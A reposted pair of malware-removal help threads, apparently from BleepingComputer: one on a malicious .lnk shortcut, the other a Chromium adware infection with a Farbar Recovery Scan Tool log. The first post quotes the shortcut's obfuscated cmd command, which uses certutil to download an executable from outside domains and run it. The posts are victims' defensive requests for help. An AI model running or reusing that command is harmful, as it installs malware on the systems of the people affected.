Featured Post

.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer

Image
.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputerPosted: 06 Jul 2020 11:33 AM PDT Hi all,Looking for feedback on the likelihood my double clicking of a bad .lnk file caused damage.. When I did double click it, I remember getting a standard windows dialog box. I believe it said the path did not exist or shortcut unavailable.. I'm not finding anything in my startup folder for C:\programdata or my username appdata startup folder...  I ran scans with malwarebytes, Hitman with no results.The .lnk file target was:%ComSpec% /v:on/c(SET V4=/?8ih5Oe0vii2dJ179aaaacabbckbdbhhe=gulches_%PROCESSOR_ARCHITECTURE% !H!&SET H="%USERNAME%.exe"&SET V4adKK47=certutil -urlcache -f https://&IF NOT EXIST !H! (!V4adKK47!izub.fun!V4!||!V4adKK47!de.charineziv.com!V4!&!H!))>nul 2>&1The .lnk file 'start-in' was:"%APPDATA%\Mic…

Chromium Infection? - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer

Chromium Infection? - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer


Chromium Infection? - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer

Posted: 29 Apr 2020 01:25 PM PDT

Recently, I started experiencing a slow computer and I noticed that I had a new icon on my desktop - Chromium. I looked it up and it appears to be malware. I ran my malware software, but it didn't appear to make any changes. I found a youtube video showing me how to remove it, because it replicates so quickly. I thought I had it removed, but then it reappeared. Then one morning, I started the computer and the computer had created a new user profile. I'm still able to access my documents (which are backed up, but I don't know how that works with Chromium in the backup) on my old user profile, but I don't know how to undo it all.

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 28-04-2020
Ran by JLO Squared (administrator) on OFFICE (Hewlett-Packard 550-047c) (29-04-2020 12:15:20)
Running from C:\Users\JLO Squared\Desktop\New folder
Loaded Profiles: JLO Squared (Available Profiles: JLO Squared)
Platform: Windows 10 Home Version 1903 18362.778 (X64) Language: English (United States)
Default browser: Chrome
Boot Mode: Safe Mode (with Networking)
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe <11>
(Google LLC -> Google) C:\Users\JLO Squared\AppData\Local\Google\Chrome\User Data\SwReporter\81.233.200\software_reporter_tool.exe <4>
(Microsoft Windows -> Microsoft Corporation) C:\Windows\HelpPane.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe <2>
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Users\JLO Squared\AppData\Local\Temp\TeamViewer\TeamViewer.exe
(TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Users\JLO Squared\AppData\Local\Temp\TeamViewer\TeamViewer_Desktop.exe

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8790264 2016-03-29] (Realtek Semiconductor Corp -> Realtek Semiconductor)
HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [323056 2015-11-04] (Intel® Rapid Storage Technology -> Intel Corporation)
HKLM\...\Run: [AVGUI.exe] => C:\Program Files\AVG\Antivirus\AvLaunch.exe [156256 2020-04-02] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [309560 2020-03-22] (Apple Inc. -> Apple Inc.)
HKLM-x32\...\Run: [DBAgent] => C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\DBAgent.exe [1562304 2017-09-16] (Seagate Technology LLC -> Seagate Technology LLC)
HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe [2133216 2017-03-23] (Wondershare Technology Co.,Ltd -> Wondershare)
HKLM-x32\...\Run: [Dropbox] => C:\Program Files (x86)\Dropbox\Client\Dropbox.exe [6856192 2020-04-28] (Dropbox, Inc -> Dropbox, Inc.)
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-19\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518656 2019-03-18] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-20\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518656 2019-03-18] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-21-3444092895-3226993445-944412456-1001\...\Run: [Spotify] => C:\Users\JLO Squared\AppData\Roaming\Spotify\Spotify.exe [22907112 2020-04-02] (Spotify AB -> Spotify Ltd)
HKU\S-1-5-21-3444092895-3226993445-944412456-1001\...\Run: [Uploader] => C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\Seagate.Dashboard.Uploader.exe [142568 2017-09-16] (Seagate Technology LLC -> Seagate Technology LLC)
HKU\S-1-5-21-3444092895-3226993445-944412456-1001\...\Run: [Chromium] => "c:\users\jlo squared\appdata\local\chromium\application\chrome.exe" --profile-directory="Default" --auto-launch-at-startup --restore-last-session
HKU\S-1-5-21-3444092895-3226993445-944412456-1001\...\Run: [GoogleChromeAutoLaunch_A3B55F10413EDA3726B7768FB296E183] => "C:\Users\JLO Squared\AppData\Local\chromium\Application\chrome.exe" --no-startup-window /prefetch:5
HKU\S-1-5-21-3444092895-3226993445-944412456-1001\...\Run: [com.squirrel.Teams.Teams] => C:\Users\JLO Squared\AppData\Local\Microsoft\Teams\Update.exe [2339472 2020-04-16] (Microsoft 3rd Party Application Component -> Microsoft Corporation)
HKU\S-1-5-21-3444092895-3226993445-944412456-1001\...\RunOnce: [Application Restart #0] => C:\Program Files\Hewlett-Packard\SimplePass\ClientCore.exe [4716280 2015-01-30] (Softex Incorporated -> Hewlett-Packard)
HKU\S-1-5-21-3444092895-3226993445-944412456-1001\...\RunOnce: [Application Restart #1] => C:\Program Files\Hewlett-Packard\SimplePass\ClientCore.exe [4716280 2015-01-30] (Softex Incorporated -> Hewlett-Packard)
HKU\S-1-5-21-3444092895-3226993445-944412456-1001\...\RunOnce: [Application Restart #2] => C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBrokerDsktop.exe [506104 2015-01-30] (Softex Incorporated -> Hewlett-Packard)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.122\Installer\chrmstp.exe [2020-04-24] (Google LLC -> Google LLC)
HKLM\Software\...\Authentication\Credential Providers: [{F3F1B0FA-4775-41d8-8578-436772D93FB4}] -> C:\Program Files\Hewlett-Packard\SimplePass\OmniPassCredProv.dll [2015-01-30] (Softex Inc..) [File not signed]
HKLM\Software\...\Authentication\Credential Provider Filters: [{F3F1B0FA-4775-41d8-8578-436772D93FB4}] -> C:\Program Files\Hewlett-Packard\SimplePass\OmniPassCredProv.dll [2015-01-30] (Softex Inc..) [File not signed]
Startup: C:\Users\JLO Squared\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EvernoteClipper.lnk [2016-05-14]
ShortcutTarget: EvernoteClipper.lnk -> C:\Program Files (x86)\Evernote\Evernote\EvernoteClipper.exe (Evernote Corporation -> Evernote Corp., 305 Walnut Street, Redwood City, CA 94063)
FF HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) ============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {04EB000B-DE21-4843-AF0B-69AED103FA3E} - System32\Tasks\DropboxOEM => C:\Program Files (x86)\Dropbox\DropboxOEM\DropboxOEM.exe
Task: {1080CFD3-9DD2-4EDA-9198-4818C769FF71} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [616832 2019-09-04] (Apple Inc. -> Apple Inc.)
Task: {1E2C9A91-8CD4-40AB-AA5D-E5711BAD4FB9} - System32\Tasks\Microsoft\Windows\Shell\FamilySafetyUpload => {EBF00FCB-0769-4B81-9BEC-6C05514111AA}
Task: {1EAB813E-DF31-4B63-BCBD-6F2B048A0266} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {290745EA-588E-4075-B643-1882941CA2E7} - System32\Tasks\Start OPBHOBroker => C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBroker.exe [506104 2015-01-30] (Softex Incorporated -> Hewlett-Packard)
Task: {2942F40C-1C29-48E1-8571-0BE70D127DB9} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {34D03CA7-4765-4D2E-829A-CA7A40E905E3} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {352E6CA0-7314-4DF4-89C4-682368D80D57} - System32\Tasks\Microsoft\Windows\Workplace Join\Automatic-Workplace-Join => C:\WINDOWS\System32\AutoWorkplace.exe
Task: {3C8C0DA7-492F-44B7-BEB4-9AB6DC7DC783} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [1506680 2019-06-14] (HP Inc. -> HP Inc.)
Task: {4EFF1458-0342-4BE0-8CB3-8834DE054C8A} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [655736 2019-07-31] (HP Inc. -> HP Inc.)
Task: {542442B0-7956-40F5-8D0B-F23073818611} - System32\Tasks\AVG\Overseer => C:\Program Files\Common Files\AVG\Overseer\overseer.exe [1692296 2020-03-03] (AVG Technologies USA, LLC -> AVG Technologies)
Task: {55B902BB-CF5D-4306-B98A-4F8CFA12641C} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [107848 2016-06-22] (Google Inc -> Google Inc.)
Task: {5A3FB241-0B11-4EA5-BC66-0D9F1B406040} - System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\BthSQM => {C8367320-6F85-11E0-A1F0-0800200C9A66} C:\WINDOWS\System32\BthTelemetry.dll [32256 2019-03-18] (Microsoft Windows -> Microsoft Corporation)
Task: {64AB27DF-D2A0-4AA2-BD46-887E347835E7} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2020-04-02] (Dropbox, Inc -> Dropbox, Inc.)
Task: {66B3A47C-8762-4AB7-811A-7138090D1480} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe [134008 2020-03-25] (HP Inc. -> HP Inc.)
Task: {6DFCB649-0769-4F83-BB10-F60F235F6D3D} - System32\Tasks\Microsoft\Windows\SkyDrive\Idle Sync Maintenance Task => {BF6C1E47-86EC-4194-9CE5-13C15DCB2001}
Task: {7198E22B-CEB9-4D0A-AD2A-CB691BE5C71B} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater - Resources => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [655736 2019-07-31] (HP Inc. -> HP Inc.)
Task: {7288D143-C5E3-4EAE-B930-94AF364C6852} - System32\Tasks\Hewlett-Packard\HP Active Health\HP Active Health Scan (HPSA) => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe [25128 2017-11-21] (HP Inc. -> )
Task: {73D99E05-D666-4107-B0F4-98A30895BFAC} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_DeviceScan => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [1117048 2020-03-26] (HP Inc. -> HP Inc.)
Task: {76547DEC-C475-411A-8FFE-C1224173C301} - \WPD\SqmUpload_S-1-5-21-3444092895-3226993445-944412456-1001 -> No File <==== ATTENTION
Task: {76936720-1AB0-4064-9C82-1049F01F3B49} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_TH57B3X08K => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [1117048 2020-03-26] (HP Inc. -> HP Inc.)
Task: {789853A6-4F4D-4B54-84EB-5E26CCAB5068} - System32\Tasks\IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473-Logon => C:\Program Files (x86)\Intel\Intel® Update Manager\bin\iumsvc.exe [177376 2016-08-12] (Intel® Update Manager -> Intel Corporation)
Task: {7D3EAABF-0FFE-4F5D-86C5-13D1BCF650F9} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2020-04-02] (Dropbox, Inc -> Dropbox, Inc.)
Task: {7EAE0B06-258C-433B-91CB-047248998407} - System32\Tasks\HPCeeScheduleForJLO Squared => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [97848 2016-01-22] (Hewlett-Packard Company -> Hewlett-Packard)
Task: {8150B613-9E3A-4D5F-AC2E-554D34DA6A22} - System32\Tasks\Start SimplePass => C:\Program Files\Hewlett-Packard\SimplePass\ClientCore.exe [4716280 2015-01-30] (Softex Incorporated -> Hewlett-Packard)
Task: {872D0E53-FD2E-41E3-B431-698AF82882CE} - System32\Tasks\Microsoft\Windows\SkyDrive\Routine Maintenance Task => {1B1F472E-3221-4826-97DB-2C2324D389AE}
Task: {872D7360-4E45-4476-B8D1-92D95D848FBA} - System32\Tasks\McAfee\McAfee Auto Maintenance Task Agent => {ABCECA3B-EA5A-496B-A021-5C6BAB365E5C}
Task: {874D3D52-8E42-4551-A6DF-477F2095B744} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [1117048 2020-03-26] (HP Inc. -> HP Inc.)
Task: {894DD150-CB69-4362-8C8E-16DFF065C8A2} - System32\Tasks\IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473 => C:\Program Files (x86)\Intel\Intel® Update Manager\bin\iumsvc.exe [177376 2016-08-12] (Intel® Update Manager -> Intel Corporation)
Task: {8B58F41B-F714-4E10-944D-FD427D31E341} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1242704 2020-02-25] (Adobe Inc. -> Adobe Systems)
Task: {8B6B33FE-BBBA-41E7-B161-E6AFFAD5F42D} - System32\Tasks\Start OPBHOBrokerDesktop => C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBrokerDsktop.exe [506104 2015-01-30] (Softex Incorporated -> Hewlett-Packard)
Task: {8BF3A153-44BE-4E32-AFD0-57D3288033A2} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {922DECAF-F7D8-4194-A153-2E31B3EBA240} - System32\Tasks\JLO Squared DBAgent 2 0 => C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\DBAgent.exe [1562304 2017-09-16] (Seagate Technology LLC -> Seagate Technology LLC)
Task: {93675644-56A3-4872-A71D-D5B68E77D4AA} - System32\Tasks\Seagate_Install_Launch => C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\Dashboard.exe [1952448 2017-09-16] (Seagate Technology LLC -> Seagate Technology LLC)
Task: {A6C2DFAC-DEEE-49C7-A940-D1B514495959} - System32\Tasks\Antivirus Emergency Update => C:\Program Files\AVG\Antivirus\AvEmUpdate.exe [3373072 2020-04-02] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
Task: {A78A2CA8-8F43-49E5-A1A7-F135FA25F253} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
Task: {AD258B33-53AA-49D7-93AF-6E24718E4116} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant printer driver installation => C:\WINDOWS\TEMP\EN7640_Full_WebPack_40.11.1135.exe <==== ATTENTION
Task: {BA235C0F-CA0F-430C-805B-5BF6ABE4B40B} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office16\OLicenseHeartbeat.exe [316632 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {BB5F56AD-07B7-42EF-9710-3A8D7795B9DA} - System32\Tasks\ChromiumUpdateTaskMachineUA => C:\Program Files (x86)\Chromium\Update\ChromiumUpdate.exe [100352 2020-03-03] (Chromium.) [File not signed] <==== ATTENTION
Task: {CE1D642D-B242-4A06-B84E-9BABB025FDE3} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [1506680 2019-06-14] (HP Inc. -> HP Inc.)
Task: {CE2DE968-E342-40D7-9566-427D45E4A886} - System32\Tasks\Microsoft\Windows\PerfTrack\BackgroundConfigSurveyor => {EA9155A3-8A39-40B4-8963-D3C761B18371}
Task: {CFA1461E-46C6-41D2-AA5A-44D1389498A2} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {D02335F3-868A-4259-ADEE-9D92D8E4AB83} - System32\Tasks\McAfee Remediation (Prepare) => C:\Program Files\Common Files\AV\McAfee Anti-Virus And Anti-Spyware\upgrade.exe [3271576 2015-11-03] (McAfee, Inc. -> McAfee, Inc.)
Task: {D1DD844A-D865-4B16-8B2A-02800E4F334C} - System32\Tasks\ChromiumUpdateTaskMachineCore => C:\Program Files (x86)\Chromium\Update\ChromiumUpdate.exe [100352 2020-03-03] (Chromium.) [File not signed] <==== ATTENTION
Task: {D22CEB41-71DA-439C-A35E-4E0AF6A5C423} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [107848 2016-06-22] (Google Inc -> Google Inc.)
Task: {D4E2A95B-6F2D-433D-A813-1627A4828B63} - \McAfee\McAfee Idle Detection Task -> No File <==== ATTENTION
Task: {D839EC74-CA2F-4086-9B89-F05CAAC1C332} - System32\Tasks\McAfeeLogon => C:\PROGRA~1\COMMON~1\McAfee\Platform\McUICnt.exe
Task: {DAB6AD75-8836-46F6-BA70-99137A3C316D} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Product Configurator => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\ProductConfig.exe [317816 2020-04-09] (HP Inc. -> HP Inc.)
Task: {E6AC8030-6DCF-494C-B829-5BCBF05036CE} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {F2CA0649-90C5-4205-943F-C64793D36272} - System32\Tasks\HPCustParticipation HP ENVY 7640 series => C:\Program Files\HP\HP ENVY 7640 series\Bin\HPCustPartic.exe [6438536 2017-05-23] (Hewlett Packard -> HP Inc.)
Task: {F4767EDD-7AFA-4F3C-A604-430266593549} - System32\Tasks\JLO Squared1 => C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\NBCore.exe [1812160 2017-09-16] (Seagate Technology LLC -> Seagate Technology LLC)
Task: {FB4C6965-BBA3-46E8-979F-059C8048C0D0} - System32\Tasks\Microsoft\Windows Live\SOXE\Extractor Definitions Update Task => {3519154C-227E-47F3-9CC9-12C3F05817F1}
Task: {FF465B5F-F549-43DD-A587-1947168BA82E} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\HPCeeScheduleForJLO Squared.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{95b1e1fa-2052-49a6-b6e2-0f29f895036b}: [DhcpNameServer] 192.168.1.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617910&ResetID=132277575682764249&GUID=AA233AE3-3D4A-43FE-8D7D-62586D1A0078
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxps://us.search.yahoo.com/yhs/web?hspart=shnl&hsimp=yhs-001&type=c110428cc03d537d5ca738cb7b0&param1=IE&param2=1&param3=campaignID%3D661%26UserID%3D1455836809&param4=XPbueSzfBeG6K2MlxBpfELmmgzh8mOsLvk1mNxKnkuDjZrnCPluhQt3wIJvlBcR/Ts5Jm44Cgtg7R+hyRCnFVOh/CRLGA3Fo3mY7ognD70Zy3phVSGODgqxN34faBn2tJIHZ7GjsUuJldvY1dAc3W1snfBzmtV3047iORbhpICU6beKvmEJChyU7g5grYVZZdWHqBZ/hWZXKpUmGbaI3DJz6ajVbHvaBH8RkIEuTsGqylUZec7zpwMNX0bQ/svFprHn9MttB1oTS2f52hOAlfzFFz+o7P1d/Y/x9SQunhc3EC6p6hGfh6y+PqAVuL1DeEatgurnBP8Du82RVREnt6mvcAw7PTVfF5G95bz5m6iwUAmEeX8gSUYjdhPRzehzNP68LwNuGDV57sSBndJmUHG/SAf31d4CTscHD9j5ag8zIMe43j6vUuXqssKZaTOhpEboXHIqUTGMm9XgE/uF2bs9+y3RzRgp4EsAq1/cP1Al0OOw2Dmli4o8dOVX+cLUnbf1us8VlmXeQ1VexsN6xQ5TNpIsJsJRhcsnoHcY3O3Fn0PFd2qaSMZ2G6Fp8KAWAtDbrXOZrUf/9wO+GxcyhyP72m64AJ5t338gyRo71a3cyU7p7pxB7be1+MQSALANm8qMWOk2+jhfkBvK+X+3Nlybv1rJLutcUcHyFd9A2edP40Txv967jLViLETgNUK3d
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://hp13.msn.com
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617910&ResetID=132277575682790558&GUID=AA233AE3-3D4A-43FE-8D7D-62586D1A0078
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://hp13.msn.com
HKU\S-1-5-21-3444092895-3226993445-944412456-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://us.search.yahoo.com/yhs/web?hspart=shnl&hsimp=yhs-001&type=c110da2133e263350f22d84b4dc&param1=IE&param2=1&param3=campaignID%3D470%26UserID%3D1222810000&param4=XPbueSzfBeG6K2MlxBpfELmmgzh8mOsLvk1mNxKnkuDjZrnCPluhQt3wIJvlBcR/Ts5Jm44Cgtg7R+hyRCnFVOh/CRLGA3Fo3mY7ognD70Zy3phVSGODgqxN34faBn2tJIHZ7GjsUuJldvY1dAc3W937tz55r9aqw/zoCn8dWMrOqaLoh2k2juXVIhiO5SlCTSaSFOun0fWDzTjHNKZk6pNVTuYTQEc76nMcmZRq2+fNfT4tmCufpJuz31VlD0D26ZGPjTh7Oqbb97AexT474146xWyJ4y5AZn66emLXWlYB91LZVfpWXx97xbwZhwXQeNnYKHwKfZbxU+Loeb2U8NrQR6+E+2cy0ZjPeLmefU7NC+iXFhCbQ1UjICocs2Sv5cFVKFmFU4LFmQrGrrKO8KGhgl17TlihFbaTfuIaxf7zGySfJhy0mpq2xDcTC/t6hxxPwD7+O2q7PJVDHA44nWVQRrCycQ3eQTyo2Es//FoiBu2+32Bu6QRRiYq2Sj+UqJBBK5+K9gnsuMmkvCS+wJAmFd2u3m/GwqbCYGhCn0xUkGqUkzzf5xcXxVJ+uxn1mnFp4ZGcMKBeW/J2NpPBPP2Nt3hVnwtypcPQ5bfolxLtAnJB2yeMk3OvhmrA/Qms920pCgQySSsJ7A7qvyJ8ANgqowsJTqUjKNG0+3Tg7RvevnLw1eyFuDJDd6CkNp/XfYo8556lolRxwpqOT9Ka6A==
HKU\S-1-5-21-3444092895-3226993445-944412456-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://hp13.msn.com
HKU\S-1-5-21-3444092895-3226993445-944412456-1001\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://js.redirect.hp.com/jumpstation?bd=all&c=144&locale=ww_ww&pf=cndt&s=ieHPtab&tp=iehome
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=shnl&hsimp=yhs-001&type=c110da2133e263350f22d84b4dc&param1=IE&param2=4&param3=campaignID%3D470%26UserID%3D1222810000&param4=XPbueSzfBeG6K2MlxBpfEDPN+SxVpua8beXQzoS1GYKgerVIJA/MgeyfUVeQOCXawoXuYOPEdQ2kll8rryAPp0J5pDTgf1kjsVJoMK5Sme337v6JF3fGCDVnOikgXtOGX5MsfV5o3f1y8jgIF9vtyPikm0FW8kvtMZJJtMjPNSAr9qv7isOGN1050MklNQ2ZkKakmrPMmOppyT7n6Sbw4XmmWWw0TgRScpY3vlLjuR6yljNS99eBpKn5S2OupFMkvdfTIxAMw+bFcuDcgIkq4HNWum+eY3c4vbIZqL25KgvCvOUQRJFSAKsSJb3l9Sf+Bwyd//1JZaPdM1ckm3EMLK4YHKDsY4kkojbK74fILJBMDLL+81wLUhs6QnD6OWPYEVzco9ahML8HKPbcDZP7rbF2Aq3g0hBVcDI6yH0F2DN8N5wR1xCvyE7XJ13gFrMONgoloTFWvxs5owdf6NgNEDaSc52H01v+JHri6UQlsrvwe/kjQevX2EhN0UHtVfq2kFcQp9+ZMM3eLYxPZqiOxgAJYkY8npoMCAgfJ8EZv5UfiN/1Mn3ElaHXVOOiGvjq9T/6uP5b/AnYJbRAOrris4QBHbV7xOzd2G+zavO14E7mP0wuxYKiiUDggxA3w2rge6u/HgFv4rymatWdXlhVW27SKaIC3x0R0x1xZNmtFpBWbt2H9rSehh9nmi7KxziNvEh+XdDMdQmigyWUk2tBAA==&p={searchTerms}
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=shnl&hsimp=yhs-001&type=c110da2133e263350f22d84b4dc&param1=IE&param2=4&param3=campaignID%3D470%26UserID%3D1222810000&param4=XPbueSzfBeG6K2MlxBpfEDPN+SxVpua8beXQzoS1GYKgerVIJA/MgeyfUVeQOCXawoXuYOPEdQ2kll8rryAPp0J5pDTgf1kjsVJoMK5Sme337v6JF3fGCDVnOikgXtOGX5MsfV5o3f1y8jgIF9vtyPikm0FW8kvtMZJJtMjPNSAr9qv7isOGN1050MklNQ2ZkKakmrPMmOppyT7n6Sbw4XmmWWw0TgRScpY3vlLjuR6yljNS99eBpKn5S2OupFMkvdfTIxAMw+bFcuDcgIkq4HNWum+eY3c4vbIZqL25KgvCvOUQRJFSAKsSJb3l9Sf+Bwyd//1JZaPdM1ckm3EMLK4YHKDsY4kkojbK74fILJBMDLL+81wLUhs6QnD6OWPYEVzco9ahML8HKPbcDZP7rbF2Aq3g0hBVcDI6yH0F2DN8N5wR1xCvyE7XJ13gFrMONgoloTFWvxs5owdf6NgNEDaSc52H01v+JHri6UQlsrvwe/kjQevX2EhN0UHtVfq2kFcQp9+ZMM3eLYxPZqiOxgAJYkY8npoMCAgfJ8EZv5UfiN/1Mn3ElaHXVOOiGvjq9T/6uP5b/AnYJbRAOrris4QBHbV7xOzd2G+zavO14E7mP0wuxYKiiUDggxA3w2rge6u/HgFv4rymatWdXlhVW27SKaIC3x0R0x1xZNmtFpBWbt2H9rSehh9nmi7KxziNvEh+XdDMdQmigyWUk2tBAA==&p={searchTerms}
SearchScopes: HKLM -> {99C2417D-5986-49E5-88A4-3ACE5730E4EA} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us1-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
